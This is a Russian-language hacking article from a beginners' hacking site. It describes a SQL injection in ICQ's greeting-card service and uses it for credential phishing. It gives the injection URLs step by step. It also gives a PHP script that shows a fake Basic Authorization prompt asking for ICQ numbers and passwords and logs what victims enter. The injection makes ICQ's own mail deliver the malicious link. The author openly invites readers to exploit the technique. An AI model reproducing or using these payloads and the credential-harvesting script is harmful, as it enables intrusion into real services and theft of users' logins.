Новичку полезно

  • Баннер
  • А знаете ли вы что?

    - тот кто на каждом углу говорит что он является хакером, на самом деле является клоуном?


ICQ# через ICQ.COM

Вводное слово:

Статьи писать, дело неблагодарное. С одной стороны для людей продвинутых написанное является бояном и не достойным внимания, с другой стороны для начинающих «хакеров» многое кажется непонятным, в конце концов, и те и те остаются недовольны, а найти золотую середину может или педагог или писатель, коими я не являюсь, так что не судите строго

В статье будут ссылки на статьи:

[cash] Проведение Инъекций в MSSQL сервер от Microsoft. http://forum.antichat.ru/thread30501.html
NOmeR1 Заходим в Icq через Xss: http://forum.antichat.ru/thread53850.html
hidden Применение Basic Authorization против форумов: http://forum.antichat.ru/showthread.php?t=20911
А также советую посмотреть различные статьи по XSS

Приступим:

Как то давно, блуждая по ICQ.com набрел я на sql инъекцию, правда инъекция была бесполезной т.к. ограничивалась только 11-ю символами, но факт наличия инъекции обрадовал, значит не все потеряно, гуляя по ссылкам я набрел вот на это:

Код:

http://greetings.icq.com/greetings/cards/254/
http://greetings.icq.com/greetings/cards/254-1/
http://greetings.icq.com/greetings/cards/253/

Наличие инъекта налицо, подобрав кол-во столбцов с помощью order by я узнал что их 19:

Код:

http://greetings.icq.com/greetings/cards/253 order by 19/

сотавив sql запрос с конструкцией UNION SELECT:

Код:

http://greetings.icq.com/greetings/cards/253
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
,16,17,18,19--/

я и не рассчитывал на успех (действительно наивно предполагать что icq.com работает на mysql, который демократичен к типам полей), предположив, что я имею дело с TransactSQL я составил запрос:

Код:

http://greetings.icq.com/greetings/cards/253
union select null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,
null,null,null,null--/

Как я и ожидал, ошибки не было, дело за малым, подобрать типы полей, сначала числовые, для этого нужно поочередно вместо каждого null подставлять число например 1, и там где не будет ошибки (у нас редирект) там и будет числовое поле:

Код:

http://greetings.icq.com/greetings/cards/-253
union select null,null,null,null,null,null,null,
null,1,null,null,null,null,null,null,null,null,
null,null --/

видим, что значение raters у нас с 0 изменилось на 1, после того как я подобрал все числовые поля пришло время подбирать строки, для этого можно (рекомендую) изначально использовать строки без кавычек, а попросту захексить, например пресловутое 0x3a:

Код:

http://greetings.icq.com/greetings/cards/-253
union select null,0x3a,null,null,null,null,null,
null,1,null,null,null,null,null,null,null,null,
null,null--/

в принципе одного поля вполне достаточно, но можно подобрать и все, далее просто узнаем версию и все остальное с помощью стандартных TSQL функций:

Код:

http://greetings.icq.com/greetings/cards/-253
union select null,@@version,null,null,null,null,
null,null,1,null,null,null,null,null,null,null,
null,null,null--/


Цитата:

Adaptive Server Enterprise/15.0.1/EBF 14210 ESD#2/P/
x86_64/Enterprise Linux/ase1501/2400/64-bit/OPT/
Fri Jan 12 17:45:01 2007

Угу, SYBASE ASE 15.0.1
Дабы искушать начинающих на изучение инъекций в TSQL не буду приводить дальнейшие действия, как например получение схемы БД и т.д. скажу только что для просмотра «самой интересной» базы прав пользователя не хватает, при раскручивании инъекции очень поможет статья [cash]`а Проведение Инъекций в MSSQL сервер от Microsoft. т.к. SYBASE и MSSQL очень похожи. К тому же цель данной статьи немного другая.

Продолжаем:

Искав выгоду и другие инъекции, я нашел такую интересную штуку:

Код:

http://greetings.icq.com/greetings/cards/
169-1/send#send_scope

отсылку поздравительных карточек на почту или на icq номер. Сразу скажу что для этого надо авторизоваться на сайте и советую под левым номером, благо дело регистрация труда не составляет и времени не отнимет. Ну так вот, проделав вышеописанные действия для получения кол-ва и типов полей я узнал вот что:

Код:

http://greetings.icq.com/greetings/cards/-169
union select 0x3a3a3a,0x3a,0x55,111,111,111--/
send#send_scope

Цитата:

 
 

border="0" class="d2-3-img">
 

т.е. первое поле в запросе отвечает за адрес картинки/flash-объекта. Отослав с помощь формы полученное себе на мыло я получил письмо от ICQ Greetings :

Цитата:

Hi!
ICQ# 428347403 ( Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript ) has sent you a greeting card
from icq.com.
To view your card, click on the link below or copy & paste it into
your browser's address box.

http://icq.com/greetings/cards/1853243/s2hestk9/view/

Проследовав по ссылке я увидел то, что и должен был увидеть. Вспомнив статью hidden`а Применение Basic Authorization против форумов я написал скрипт и залил его на сервер, скрипт такой:

PHP код:

header("Content-type: image/png");
$im = ImageCreateFromPng("1.PNG");
$fp1 = fopen("time.txt", "a+");
fputs($fp1, date("F j, Y, H:i",time())."\n"); fclose($fp1);
$login = $_SERVER['PHP_AUTH_USER'];
$pass  = $_SERVER['PHP_AUTH_PW'];
if ((strlen($login)9)||(strlen($pass) {
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Enter ICQ# and password"');
$im = ImageCreateFromPng("2.PNG");

}
else
{
$content=$login.':'.$pass."\n";
$fp = fopen("log.txt", "a+");
fputs($fp, $content);
fclose($fp);
}

imagepng($im);
imagedestroy($im);

?>

полностью скрипт пояснять я не буду, т.к. все отлично написано в статье hidden`а, скажу лишь, что 1.PNG это рисунок высотой 407 и шириной 610 пикселей с поздравительным изображением (для меньшего палева), 2.PNG – рисунок с такими же размерами, с белым фоном и надписью красного цвета:

Цитата:

ICQ# and/or password are incorrect. Please fill in your details again

в файл time.txt будет записано время заходов на эту картинку, в log.txt логины и пароли. называем скрипт например 1.php и захексим полный путь до скрипта: http://site/1.php -> 0x687474703A2F2F736974652F312E706870 дальше просто вставляем это в первое поле инъекта и отправляем жертве:

Код:

http://greetings.icq.com/greetings/cards/-169
union select 0x687474703A2F2F736974652F312E706870,
0x3a,0x55,111,111,111--/send#send_scope

жертва получит письмо с содержанием, которое я описал выше, и при переходе по ссылке увидит окно Basic Authorization c просьбой ввести номер icq и пароль.

Заканчиваем:

Да немного народу на это ведется но и фантазия Соц. инженеров безгранична, особенно сейчас, когда стали модны социальные сети, например можно сделать редирект на фейк, который описал в своей статье Заходим в Icq через Xss NOmeR1. Вобщем мое дело показать, ваше дело эксплуатировать.

Спасибо за прочтение. Scipio

Добавить комментарий








VK Стена

  • Новость: Хакерская группа #GhostShell объявила войну властям России
  • Пост: Новые сиськи в альбоме "Девушки" http://vk.com/album-1815460 ...
  • Новое фото в альбоме "Мемы/Тролфэйсы/Покетфэйсы и т.д."
  • Новость: #Anonymous похитили личные электронные письма офицеров полиции Англии
  • Новость: Что можно купить за 50 долларов
  • Новость: Хотите заработать денег?
  • Пост: Hacker с именем "LegitHacker97" заявил, что успешно взломал ...
  • Новость: Киберпреступность виновата в задержках новых продуктов #Microsoft
  • Новое фото в альбоме "Приколы"
  • Ссылка: Wikileaks начал публикацию уставов американских военных тюрем

Cтатистика

SMS.копилка

SMS.копилка

Orphus

Система Orphus